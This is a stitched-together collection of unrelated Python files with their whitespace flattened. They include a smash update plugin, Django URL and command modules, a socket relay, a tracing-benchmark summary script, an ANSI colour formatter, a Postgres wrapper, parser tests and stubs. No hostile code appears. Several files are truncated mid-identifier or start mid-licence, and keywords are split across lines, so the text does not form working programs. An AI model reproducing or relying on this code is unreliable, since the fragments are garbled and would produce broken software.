This will default to using whatever branch is already checked out """ from fabric import api from goulash.python import splitext, ops from smashlib import get_smash from smashlib.util import CLOpt from smashlib.plugins import Plugin from smashlib.util.events import receives_event from smashlib.channels import C_SMASH_INIT_COMPLET
E from smashlib import data class UpdateSmash(Plugin): """ This plugin is responsible for doing the work whenever smash is invoked with "--update". """ update = None verbose = True # do not change, user needs some feedback def get_cli_arguments(self): return [ CLOpt( args = ['--update'], kargs = dict(default=False, action='store_true')) ] def use_argv(self, args): self.update = args.update @receives_event(C_SMASH_INIT_COMPLETE) def consider_updating(self): if self.update: try: self.run_update() finally: self.smash.shell.run_cell('exit') def run_update(self): """ """ smash_dir = data.SMASH_DIR with api.lcd(smash_dir): with api.settings(api.hide('warnings'), warn_only=True, quiet=True): result = api.local('git diff-index --quiet HEAD --') changed = (1 == result.return_code) if changed: error = "aborting due to local changes in {0}" self.report(error.format(smash_dir)) else: api.local('git pull') api.local('./bin/pip install -r requirements.txt') def load_ipython_extension(ip): """ called by %load_ext magic """ return UpdateSmash(get_ipython()).install()
from django.core.management.base import
BaseCommand from lizard_blockbox import import_helpers class Command(BaseCommand): args = "" help = "Merge the measure shapes to get one json." def handle(self, *args, **kwargs): import
_helpers.merge_measures_blockbox(self.stdout)
import clr clr.AddReference('RevitAPI') from Autodesk.Revit.DB import * mats = UnwrapElement(IN[0]) colorlist = list() glowlist = list() classlist = list() shinylist = list() smoothlist = list() translist = list() for mat in mats: colorlist.append(mat.Color) if mat.Glow: glowlist.append(True) else: glowlist.append(False) classlist.append(mat.MaterialClass) shinylist.
append(mat.Shininess) smoothlist.
append(mat.Smoothness) translist.append(mat.Transparency) OUT = (classlist,colorlist,glowlist,shinylist,smoothlist,translist)
# The MIT License (MIT) # # Copyright shifvb 2015 # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE.
import select def read_write(client, target): time_out_max = 20 socs = [client, target] count = 0 while 1: count += 1 (recv, _, error) = select.select(socs, [], socs, 3) if error: break if recv: for in_ in recv: data = in_.recv(8192) if in_ is client: out = target else: out = client if data: # # deb
ug # if out == target: # print('client->server {}\n'.format(data)) # else: # print('server->client {}\n'.format(data)) out.send(data) count = 0 if count == time_out_max: break
import sys import random import collections import itertools import bisect # @include def nonuniform_random_number_generation(values, probabilities): prefix_sum_of_probabilities = ( [0.0] + list(itertools.accumulate(probabilities))) interval_idx = bisect.bisect(prefix_sum_of_probabilities, random.random()) - 1 return values[interval_idx] # @exclude def main(): n = int(sys.argv[1]) if len(sys.argv) == 2 else random.randint(1, 50) T = [float(i) for i in range(n)] P = [] full_prob = 1.0 for i in range(n - 1): pi = random.uniform(0.0, full_prob) P.append(pi) full_prob -= pi P.append(full_prob) print(*T) print(*P) print(nonuniform_random_number_generation(T, P)) # Test. Perform the nonuniform random number generation for n * k_times # times and calculate the distribution of each bucket. k_times = 100000 counts = collections.Counter( int(nonuniform_random_number_generation(T, P)) for _ in range(n * k
_times)) for i in range(n): print(counts[i] / (n * k_
times), P[i]) assert abs(counts[i] / (n * k_times) - P[i]) < 0.01 if __name__ == '__main__': main()
""" def toLocal(dt, offset = 8): dt: datetime offset: default 8 china time """
import datetime def toLocal(dt, offset = 8): localDateTime = dt + datetim
e.timedelta(hours=offset) return localDateTime if __name__ == '__main__': now = datetime.datetime.utcnow() print now print toLocal(now) print now
DING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import argparse import csv import math import pprint import statistics import numpy import re # Utilit
y functions. def GetFileValues(filename): values = [] with open(filename, 'r') as filecontent: if 'overhead-babeltrace' in filename: for line in filecontent.readlines():
match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) if 'overhead-find' in filename: for line in filecontent.readlines(): match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) elif 'overhead-cpu' in filename: for line in filecontent.readlines(): match = re.match(r'(.*)total time:\s*(.*)s.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) elif 'overhead-lighttpd' in filename: for line in filecontent.readlines(): match = re.match(r'(.*)Time taken for tests:\s*(.*) seconds.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) else: first = True reader = csv.reader(filecontent) for row in reader: if first: first = False continue v = eval(row[0]) if 'overhead-mongo' in filename: v = v / 1000000000 values.append(v) return values def GetXYFileValues(filename): x = [] y = [] with open(filename, 'r') as filecontent: first = True reader = csv.reader(filecontent) for row in reader: if first: first = False continue y.append(eval(row[0])) x.append(eval(row[1])) return {'x': x, 'y': y} def GetXYFileStdDev(filename): values = GetXYFileValues(filename) grouped = {} for i in range(0, len(values['x'])): if values['x'][i] not in grouped: grouped[values['x'][i]] = [] grouped[values['x'][i]].append(values['y'][i]) total_stddev = 0 for x, v in grouped.items(): stddev = math.sqrt(statistics.variance(v)) if stddev > total_stddev: total_stddev = stddev return stddev def GetFileMean(filename): values = GetFileValues(filename) return statistics.mean(values) def GetFileStdDev(filename): values = GetFileValues(filename) return math.sqrt(statistics.variance(values)) def RemoveBase(values, base, numactions): values[:] = [(value - base) / numactions for value in values] return values # Experiment: GETPID def SummaryGetPid(results_dir): NUM_ACTIONS = 100000000 base_mean = GetFileMean(results_dir + '/getpid-base.csv') emptyprobes_mean = GetFileMean(results_dir + '/getpid-emptyprobes.csv') bookkeeping_mean = GetFileMean(results_dir + '/getpid-bookkeeping.csv') signal_mean = GetFileMean(results_dir + '/getpid-signal.csv') base_stddev = GetFileStdDev(results_dir + '/getpid-base.csv') emptyprobes_stddev = GetFileStdDev(results_dir + '/getpid-emptyprobes.csv') bookkeeping_stddev = GetFileStdDev(results_dir + '/getpid-bookkeeping.csv') signal_stddev = GetFileStdDev(results_dir + '/getpid-signal.csv') print('EXPERIMENT: GETPID (base stddev: {0:.1f})'.format(base_stddev / base_mean)) print('Empty probes: {0:.0f} ns (stddev={1:.1f})'.format((emptyprobes_mean - base_mean) / NUM_ACTIONS, 100 * emptyprobes_stddev / emptyprobes_mean)) print('Bookkeeping: {0:.0f} ns (stddev={1:.1f})'.format((bookkeeping_mean - base_mean) / NUM_ACTIONS, 100 * bookkeeping_stddev / bookkeeping_mean)) print('Signal: {0:.0f} ns (stddev={1:.1f})'.format((signal_mean - base_mean) / NUM_ACTIONS, 100 * signal_stddev / signal_mean)) print() # Experiment: UST def SummaryUST(results_dir): NUM_ACTIONS = 100000000 base_mean = GetFileMean(results_dir + '/ust-base.csv') tracepoint_mean = GetFileMean(results_dir + '/ust-tracepoint.csv') tracepoint_stddev = GetFileStdDev(results_dir + '/ust-tracepoint.csv') print('EXPERIMENT: UST TRACEPOINT') print('UST event: {0:.0f} ns (stddev: {1:.1f})'.format((tracepoint_mean - base_mean) / NUM_ACTIONS, 100 * tracepoint_stddev / tracepoint_mean)) print('') # Experiment: LIBUNWIND def SummaryLibunwind(results_dir): NUM_ACTIONS = 1 base = GetFileMean(results_dir + '/libunwind-base.csv') minregs = GetXYFileValues(results_dir + '/libunwind-optimal-withcache.csv') minregs_nocache = GetXYFileValues(results_dir + '/libunwind-optimal-nocache.csv') master_nocache = GetXYFileValues(results_dir + '/libunwind-nocache.csv') base_stddev = GetXYFileStdDev(results_dir + '/libunwind-base.csv') minregs_stddev = GetXYFileStdDev(results_dir + '/libunwind-optimal-withcache.csv') minregs_nocache_stddev = GetXYFileStdDev(results_dir + '/libunwind-optimal-nocache.csv') master_nocache_stddev = GetXYFileStdDev(results_dir + '/libunwind-nocache.csv') minregs['y'] = RemoveBase(minregs['y'], base, NUM_ACTIONS) minregs_nocache['y'] = RemoveBase(minregs_nocache['y'], base, NUM_ACTIONS) master_nocache['y'] = RemoveBase(master_nocache['y'], base, NUM_ACTIONS) minregs['x'] = RemoveBase(minregs['x'], 0, 1) minregs_nocache['x'] = RemoveBase(minregs_nocache['x'], 0, 1) master_nocache['x'] = RemoveBase(master_nocache['x'], 0, 1) minregs_reg = numpy.polyfit(minregs['x'], minregs['y'], 1) minregs_nocache_reg = numpy.polyfit(minregs_nocache['x'], minregs_nocache['y'], 1) master_nocache_reg = numpy.polyfit(master_nocache['x'], master_nocache['y'], 1) print('EXPERIMENT: LIBUNWIND') print('Minimal regs, with cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_reg[0], minregs_reg[1], minregs_stddev)) print('Minimal regs, no cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_nocache_reg[0], minregs_nocache_reg[1], minregs_nocache_stddev)) print('Master, no cache : frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(master_nocache_reg[0], master_nocache_reg[1], master_nocache_stddev)) print() # Experiment: OVERHEAD def SummaryOverhead(results_dir): APPS = ['cpu', 'babeltrace', 'find', 'mongo'] TESTS = ['nothing', 'kernel', 'notracing-cpusyscalls', 'ust-cpusyscalls', 'critical-cpusyscalls'] FANCY_TESTS = ['Base ', 'Traditionnal tracing ', 'Generating stack events / No tracing ', 'Tracing stack events ', 'Tracing stack and critical path events '] print('EXPERIMENT: OVERHEAD') results = {} for app in APPS: base = GetFileMean(results_dir + '/overhead-' + app + '/nothing.csv') results[app] = {} for test in TESTS: mean = GetFileMean(results_dir + '/overhead-' + app + '/' + test + '.csv') stddev = GetFileStdDev(results_dir + '/overhead-' + app + '/' + test + '.csv') overhead = ((mean / base) - 1) * 100 results[app][test] = {'mean': mean, 'stddev': stddev, 'overhead': overhead} print('TABLE: TIME') for test_i in range(0, len(TESTS)): line = [FANCY_TESTS[test_i]] for app in APPS: line.append(results[app][TESTS[test_i]]['mean']) line.append(results[app][TESTS[test_i]]['stddev']) print('{0}& {1:.2f} & {2:.2f} & {3:.2f} & {4:.2f} & {5:.2f} & {6:.2f} & {7:.2f} & {8:.2f} \\\\\\hline'.format(*line)) print() print('TABLE: PERCENT') for test_i in range(0, len(TESTS)): line = [FANCY_TESTS[test_i]] for app in APPS: line.append(results[app][TESTS[test_i]]['overhead']) print('{0}& {1:.1f} & {2:.1f} & {3:.1f} & {4:.1f} \\\\\\hline'.format(*line)) print() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Generate summary from experimental results.') parser.add_argument('results', metavar="<path/to/results>", help='Path to results directory.') args = parser.parse_ar
# Copyright (c) 2010-2013 by Yaco Sistemas <goinnn@gmail.com> or <pmartin@yaco.es> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either ver
sion 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with this programe.
If not, see <http://www.gnu.org/licenses/>. try: from django.conf.urls import include, patterns, url except ImportError: # Django < 1.4 from django.conf.urls.defaults import include, patterns, url urlpatterns = patterns('testing.example_extra_fields.views', url(r'^$', 'extra_index', name='extra_index'), url(r'^(?P<resource_id>\w+)/$', 'extra_edit', name="extra_edit"), )
# coding=utf-8 # URL: https://pymedusa.com # # This file is part of Medusa. # # Medusa is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Medusa is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Medusa. If not, see <http://www.gnu.org/licenses/>. """Custom exceptions used or raised by indexer_api""" from tvdb_api.tvdb_exceptions import (tvdb_exception, tvdb_error, tvdb_userabort, tvdb_shownotfound, tvdb_showincomplete, tvdb_seasonnotfound, tvdb_episodenotfound, tvdb_attributenotfound) indexerExcepts = ["indexer_exception", "indexer_error", "indexer_userabort", "indexer_shownotfound", "indexer_showincomplete", "indexer_seasonnotfound", "indexer_episodenotfound", "indexer_attributenotfound"] tvdbExcepts = ["tvdb_exception", "tvdb_error
", "tvdb_userabort", "tvdb_shownotfound", "tvdb_showincomplete", "tvdb_seasonnotfound", "tvdb_episodenotfound", "t
vdb_attributenotfound"] # link API exceptions to our exception handler indexer_exception = tvdb_exception indexer_error = tvdb_error indexer_userabort = tvdb_userabort indexer_attributenotfound = tvdb_attributenotfound indexer_episodenotfound = tvdb_episodenotfound indexer_seasonnotfound = tvdb_seasonnotfound indexer_shownotfound = tvdb_shownotfound indexer_showincomplete = tvdb_showincomplete
ICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Foundation) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## """ This file implements an expression syntax, similar to ``printf``, for adding ANSI colors to text. See ``colorize()``, ``cwrite()``, and ``cprint()`` for routines that can generate colored output. ``colorize`` will take a string and replace all color expressions with ANSI control codes. If the ``isatty`` keyword arg is set to False, then the color expressions will be converted to null strings, and the returned string will have no color. ``cwrite`` and ``cprint`` are equivalent to ``write()`` and ``print()`` calls in python, but they colorize their output. If the ``stream`` argument is not supplied, they write to ``sys.stdout``. Here are some example color expressions: ========== ============================================================ Expression Meaning ========== ============================================================ @r Turn on red coloring @R Turn on bright red coloring @*{foo} Bold foo, but don't change text color @_{bar} Underline bar, but don't change text color @*b Turn on bold, blue text @_B Turn on bright blue text with an underline @. Revert to plain formatting @*g{green} Print out 'green' in bold, green text, then reset to plain. @*ggreen@. Print out 'green' in bold, green text, then reset to plain. ========== ============================================================ The syntax consists of: ========== ================================================= color-expr '@' [style] color-code '{' text '}' | '@.' | '@@' style '*' | '_' color-code [krgybmcwKRGYBMCW] text .* ========== ================================================= '@' indicates the start of a color expression. It can be followed by an optional * or _ that indicates whether the font should be bold or underlined. If * or _ is not provided, the text will be plain. Then an optional color code is supplied. This can be [krgybmcw] or [KRGYBMCW], where the letters map to black(k), red(r), green(g), yellow(y), blue(b), magenta(m), cyan(c), and white(w). Lowercase letters denote normal ANSI colors and capital letters denote bright ANSI colors. Finally, the color expression can be followed by text enclosed in {}. If braces are present, only the text in braces is colored. If the braces are NOT present, then just the control codes to enable the color will be output. The console can be reset later to plain text with '@.'. To output an @, use '@@'. To output a } inside braces, use '}}'. """ import re import sys from contextlib import contextmanager class ColorParseError(Exception): """Raised when a color format fails to parse.""" def __init__(self, message): super(ColorParseError, self).__init__(message) # Text styles for ansi codes styles = {'*': '1', # bold '_': '4', # underline None: '0'} # plain # Dim and bright ansi colors colors = {'k': 30, 'K': 90, # black 'r': 31, 'R': 91, # red 'g': 32, 'G': 92, # green 'y': 33, 'Y': 93, # yellow 'b': 34, 'B': 94, # blue 'm': 35, 'M': 95, # magenta 'c': 36, 'C': 96, # cyan 'w': 37, 'W': 97} # white # Regex to be used for color formatting color_re = r'@(?:@|\.|([*_])?([a-zA-Z])?(?:{((?:[^}]|}})*)})?)' # Mapping from color arguments to values for tty.set_color color_when_values = { 'always': True, 'auto': None, 'never': False } # Force color; None: Only color if stdout is a tty # True: Always colorize output, False: Never colorize output _force_color = None def _color_when_value(when): """Raise a ValueError for an invalid color setting. Valid values are 'always', 'never', and 'auto', or equivalently, True, False, and None. """ if when in color_when_values: return color_when_values[when] elif when not in color_when_values.values(): raise ValueError('Invalid color setting: %s' % when) return when def get_color_when(): """Return whether commands should print color or not.""" if _force_color is not None: return _force_color return sys.stdout.isatty() def set_color_when(when): """Set when color should be applied. Options are: * True or 'always': always print color * False or 'never': never print color * None or 'auto': only print color if sys.stdout is a tty. """ global _force_color _force_color = _color_when_value(when) @contextmanager def color_when(value): """Context manager to temporarily use a particular color setting.""" old_value = value set_color_when(value) yield set_color_when(old_value) class match_to_ansi(object): def __init__(self, color=True): self.color = _color_when_value(color) def escape(self, s): """Returns a TTY escape sequence for a color""" if self.color: return "\033[%sm" % s else: return '' def __call__(self, match): """Convert a match object generated by ``color_re`` into an ansi color code. This can be used as a handler in ``re.sub
``. """ style, color, text = match.groups() m = match.group(0) if m == '@@': return '@' elif m == '@.': return self.escape(0) elif m == '@': raise ColorParseError("Incomplete color format: '%s' in %s" % (m, match.string)) string = styles[style] if color: if color not in colors: raise Color
ParseError("invalid color specifier: '%s' in '%s'" % (color, match.string)) string += ';' + str(colors[color]) colored_text = '' if text: colored_text = text + self.escape(0) return self.escape(string) + colored_text def colorize(string, **kwargs): """Replace all color expressions in a string with ANSI control codes. Args: string (str): The string to replace Returns: str: The filtered string Keyword Arguments: color (bool): If False, output will be plain text without control codes, for output to non-console devices. """ color = _color_when_value(kwargs.get('color', get_color_when())) return re.sub(color_re, match_to_ansi(color), string) def clen(string): """Return the length of a string, excluding ansi color sequences.""" return len(re.sub(r'\033[^m]*m', '', string)) def cextra(string): """"Length of extra color characters in a string""" return len(''.join(re.findall(r'\033[^m]*m', string))) def cwrite(string, stream=sys.stdout, color=None): """Replace all color expressions in string with ANSI control codes and write the result to the stream. If color is False, this will write plain text with o color. If True, then it will always write colored output. If not supplied, then it will be set based on stream.isatty(). """ if color is None: color = get_color_when() stream.write(colorize(string, color=color)) def cprint(string, stream=sys.stdout, color=None): """Same as cwrite, but writes a trailing newline to the stream.""" cwrite(string + "\n", stream, color) def cescape(string): """Replace all @ with @@ in the string provid
import matplotlib.pyplot as plt import numpy as np from scipy.optimize import root import bct eps = np.finfo(float).eps def pij_wij(x,y,t): xij = np.outer(x,x) yij = np.outer(y,y) pij = xij*((yij)**t)/(1.0+xij*(yij**t) - (yij**t)) wij = (t*(xij-1.0)*(yij**t))/((1.0 + xij*(yij**t) - (yij**t) )) - 1.0/(np.log(np.abs(yij+eps))) return pij,wij def eq(z, t, ki, si): nz = len(z) n = nz//2 pij,wij = pij_wij(z[0:n],z[n:],t) # x is first half, y is second half #print(pij.shape,wij.shape,ki.shape,si.shape) #pij -= pij.di np.fill_diagonal(pij,0) np.fill_diagonal(wij,0) delta_pij = np.sum(pij,axis=0) - ki delta_wij = np.sum(wij,axis=0) - si return np.concatenate([delta_pij, delta_wij]) def factor_model(ci,T,eta,mu, correlation=False): N = len(ci) # number of nodes, length of membership vector, # Initialize the observations vector a TxN matrix of NaNs, Y = np.ones([T,N])*np.nan # Fill the identical observations in the maximally correlated subsets, for c in np.unique(ci): i = np.where(ci==c)[0] Y[:,i] = np.kron(np.ones((1,(ci==c).sum())),np.random.randn(T,1)) # Add local noise beta on each time-series, Y += eta*np.random.randn(T,N) # Add global signal mu that correlates globally each time series, Y += mu*np.kron(np.ones((1,N)),np.random.randn(T,1)) from scipy.stats import zscore Y = zscore(Y) if correlation: C = np.corrcoef(Y.T) np.fill_diagonal(C,0) else: C = np.cov(Y.T) return C def inference_cEWRGt(W, thresh): k = (W>0).sum(axis=0) # degrees s = W.sum(axis=0) # strength #from scipy.optimize import root from scipy.optimize import least_squares x0=np.concatenate([k,s])*1E-4 # initial solution # Initialize least squares from previous solution sollm = least_squares(lambda v: eq(v,thresh,k,s), x0=x0, bounds= (0,np.inf), method='trf', ftol=1E-8, xtol=1E-8, verbose=1) sollm = root(lambda z: eq(z,thresh,k,s), x0=x0, method='lm', options={'xtol':1E-30,'gtol':1E-30,'ftol':1E-30}, tol=1E-6) #print('Final cost', sollm['cost']) sollm = sollm['x'] n2 = int(len(sollm)//2) x,y = sollm[0:n2],sollm[n2:] return x, y def plot_results(W,x,y,thresh): pij,wij = pij_wij(x,y,thresh) # compute the output from the optimization result plt.figure(figsize=(12,8)) plt.subplot(2,3,1) im = plt.imshow(pij) plt.colorbar(im,fraction=0.046, pad=0.04) plt.grid(False) plt.title('$p_{ij}$') plt.subplot(2,3,2) im = plt.imshow(wij) plt.colorbar(im,fraction=0.046, pad=0.04) plt.grid(False) plt.title('$<w_{ij}>$') plt.subplot(2,3,3) im = plt.i
mshow(W) plt.colorbar(im,fraction=0.046, pad=0.04) plt.grid(False) plt.title('empirical matrix') plt.subplot(2,3,4) plt.plot((W>0).sum(axis=0),pij.sum(axis=0), 'b.') plt.plot(np.linspace(0,pij.sum(axis=0).max()),np.linspace(0,pij.sum(axis=0).max()),'r-') plt.grid(True) plt.axis('equal') plt.title('$k_i - <k_i>$') plt.ylabel('model') plt.xlabel('empirical') #plt.xlim([0,m
in((W>0).sum(axis=0).max(),pij.sum(axis=0).max())]) #plt.ylim([0,min((W>0).sum(axis=0).max(),pij.sum(axis=0).max())]) plt.subplot(2,3,5) plt.plot(W.sum(axis=0),wij.sum(axis=0), 'b.') plt.plot(np.linspace(0,wij.sum(axis=0).max()),np.linspace(0,wij.sum(axis=0).max()),'r-') plt.title('$ s_i - <s_i>$') plt.axis('equal') #plt.xlim([0,wij.sum(axis=0).max()]) #plt.ylim([0,wij.sum(axis=0).max()]) plt.grid(True) plt.ylabel('model') plt.xlabel('empirical') plt.tight_layout() plt.show() if __name__=='__main__': thresh = 0.2 # threshold T = 200 # number of time points to sample eta = 3.0 # localnoise mu = 1.0 # globalnoise C = np.arctanh(factor_model([1]*40 + [2]*40 + [3]*30, T, eta, mu, True)) At = bct.threshold_absolute(C, thresh) n=len(At) k = (At>0).sum(axis=0) s = At.sum(axis=0) x,y = inference_cEWRGt(At, thresh) plot_results(At, x, y, thresh)
from configparser import ConfigParser import psycopg2 class Postgres(object): def __init__(self, db_name): filename = 'database.ini' section = 'postgresql' parser = ConfigParser() parser.read(filename) self.db = {} if parser.has_section(section): self.db['database'] = db_name params = parser.items(section) for param in params: self.db[param[0]] = param[1] else: raise Exception('Section {0} not found in the {1} file'.format(section, filename)) def connect(self): self.co
nn = None try: self.conn = psycopg2.connect(**self.db) self.cur = self.conn.cursor() except (Exception, psycopg2.DatabaseError) as error: print(error) def close(self): self.conn.close() def execute(self, sql, params = ()): self.cur.execute(sql, params) self.conn.commit() def get_version(self): self.connect() self.cur.execute('SELECT version()') ver
sion = self.cur.fetchone() self.close() return version
import io import json import os import subprocess import sys import unittest from os.path import join, abspath, dirname sys.path.append('..') from python_driver import __version__, get_processor_instance from python_driver.requestprocessor import ( Request, Response, RequestProcessorJSON, InBuffer, EmptyCodeException) from typing import Dict, Any, List, AnyStr, Optional, Iterator, cast CURDIR =
abspath(dirname(__file__)) # Disabled until I update the new module with typing # class TestTypeCheck(uni
ttest.TestCase): # def test_10_check(self) -> None: # prevdir = os.getcwd() # try: # os.chdir(dirname(CURDIR)) # srcdir = abspath(join(dirname(CURDIR), 'python_driver', '*')) # self.assertEqual(subprocess.call(['test/typecheck.sh', srcdir], shell=True), 0) # finally: # os.chdir(prevdir) class TestPythonDriverBase(unittest.TestCase): def _restart_data(self, format_: str='json') -> None: assert format_ == 'json' with open(join(CURDIR, 'data', 'helloworld.py')) as f: testcode = f.read() self.data = Request({ 'filepath': 'test.py', 'action': 'ParseAST', 'content': testcode, 'language': 'python', }) bufferclass = io.StringIO if format_ == 'json' else io.BytesIO # This will mock the python_driver stdin self.sendbuffer = bufferclass() # This will mock the python_driver stdout self.recvbuffer = bufferclass() @staticmethod def _extract_docs(inbuffer: InBuffer) -> Iterator[Response]: """ This generator will read the inbuffer yielding the JSON docs when it finds the ending mark """ line: str for line in inbuffer.readlines(): yield json.loads(line) def _loadResults(self, format_: str) -> List[Response]: """Read all msgs from the recvbuffer""" self.recvbuffer.seek(0) res: List[Response] = [] res = [doc for doc in self._extract_docs(self.recvbuffer)] return res class Test10ProcessRequestFunc(TestPythonDriverBase): def _add_to_buffer(self, count: int, format_: str) -> None: """Add count test msgs to the sendbuffer""" for i in range(count): msg = '' msg = json.dumps(self.data, ensure_ascii=False) + '\n' self.sendbuffer.write(msg) self.sendbuffer.flush() def _send_receive(self, nummsgs: int, outformat: str='json', dataupdate: Optional[Dict[AnyStr, Any]]=None, restart_data: bool=True) -> List[Response]: if restart_data: self._restart_data(outformat) if dataupdate: self.data.update(dataupdate) self._add_to_buffer(nummsgs, outformat) self.sendbuffer.seek(0) processor, _ = get_processor_instance( outformat, custom_outbuffer=self.recvbuffer, custom_inbuffer=self.sendbuffer ) processor.process_requests(self.sendbuffer) return self._loadResults(outformat) def _check_reply_dict(self, response: Response, has_errors: bool=False) -> None: self.assertIsInstance(response, dict) status = response.get('status') if has_errors: assert status in ('error', 'fatal') errors = response.get('errors', list) self.assertIsInstance(errors, list) self.assertGreater(len(errors), 0) else: self.assertEqual(status, 'ok') self._check_AST_dict(response) language_version = response['metadata'].get('language_version', -1) assert str(language_version) in ('2', '3') def _check_AST_dict(self, response: Response) -> None: self.assertIsNotNone(response) assert 'ast' in response self.assertIsInstance(response['ast'], dict) root_key = list(response['ast'].keys())[0] assert root_key for key in ('ast_type', 'body'): assert key in response['ast'][root_key] self.assertIsInstance(response['ast'][root_key]['body'], list) for item in response['ast'][root_key]['body']: for key in ('ast_type', 'lineno', 'col_offset'): assert key in item def test_010_normal_json(self) -> None: replies = self._send_receive(1, 'json') self.assertEqual(len(replies), 1) self._check_reply_dict(replies[0]) def test_020_normal_json_many(self) -> None: replies = self._send_receive(100, 'json') self.assertEqual(len(replies), 100) for reply in replies: self._check_reply_dict(reply) def test_030_error_print(self) -> None: wrongcode = 'wtf lol' replies = self._send_receive(1, 'json', {'content': wrongcode}) self.assertEqual(len(replies), 1) ast = replies[0].get('ast') self.assertIsNone(ast) self._check_reply_dict(replies[0], has_errors=True) # Check that it still alive self._restart_data() replies = self._send_receive(1, 'json') self.assertEqual(len(replies), 1) def test_040_broken_json(self) -> None: self._restart_data('json') brokendata = json.dumps(self.data, ensure_ascii=False)[:-30] self.sendbuffer.write(brokendata) self.sendbuffer.flush() reply = self._send_receive(1, 'json', restart_data=False)[0] self.assertEqual(reply['status'], 'fatal') self.assertEqual(len(reply['errors']), 1) class Test20ReqProcMethods(TestPythonDriverBase): def test_10_send_response_json(self) -> None: self._restart_data('json') processor = RequestProcessorJSON(self.recvbuffer) processor._send_response(cast(Response, self.data)) res = self._loadResults('json') self.assertEqual(len(res), 1) self.assertDictEqual(self.data, res[0]) # process request already tested with TestPythonDriverBase def test_20_return_error(self) -> None: self._restart_data('json') processor = RequestProcessorJSON(self.recvbuffer) processor.errors = ['test error'] processor._return_error('test.py', 'fatal') res = self._loadResults('json') self.assertEqual(len(res), 1) self.assertDictEqual(res[0] , {'driver': 'python23:%s' % __version__, 'errors': ['test error'], 'filepath': 'test.py', 'ast': None, 'status': 'fatal'}) if __name__ == '__main__': unittest.main()
# -*- coding: utf-8 -*- """Factories to help in tests.""" from factory import PostGenerationMethodCall, Sequence from factory.alchemy import SQLAlchemyModelFactory from authmgr.database import db from authmgr.user.models import User class BaseFactory(SQLAlchemyModelFactory): """Base factory.""" class Meta: """Factory configuration."""
abstract = True sqlalchemy_session = db.session class UserFactory(BaseFactory): """User factory.""" usern
ame = Sequence(lambda n: 'user{0}'.format(n)) email = Sequence(lambda n: 'user{0}@example.com'.format(n)) password = PostGenerationMethodCall('set_password', 'example') active = True class Meta: """Factory configuration.""" model = User
############################################################################### # Name: txtutil.py # # Purpose: Text Utilities. # # Author: Cody Precord <cprecord@editra.org> # # Copyright: (c) 2009 Cody Precord <staff@editra.org> # # Licence: wxWindows Licence # ############################################################################### """ Editra Business Model Library: Text Utilities Utility functions for managing and working with text. """ __author__ = "Cody Precord <cprecord@editra.org>" __svnid__ = "$Id: txtutil.py 62571 2009-11-08 17:53:27Z CJP $" __revision__ = "$Revision: 62571 $" __all__ = [ 'IsUnicode', ] #-----------------------------------------------------------------------------# # Imports import types #-------------------------------------
----------------------------------------# def IsUnicode(txt): """Is the given string a unicode string @param txt: object @return: bool """ return isinstance(txt, ty
pes.UnicodeType)
d
ef on_square(): pass def total_after():
pass
# -*- coding: utf-8 -*- import user import inscriptio
n import notes import util import stage # vim:expandtab:s
martindent:tabstop=4:softtabstop=4:shiftwidth=4:
pr
int("test\n")
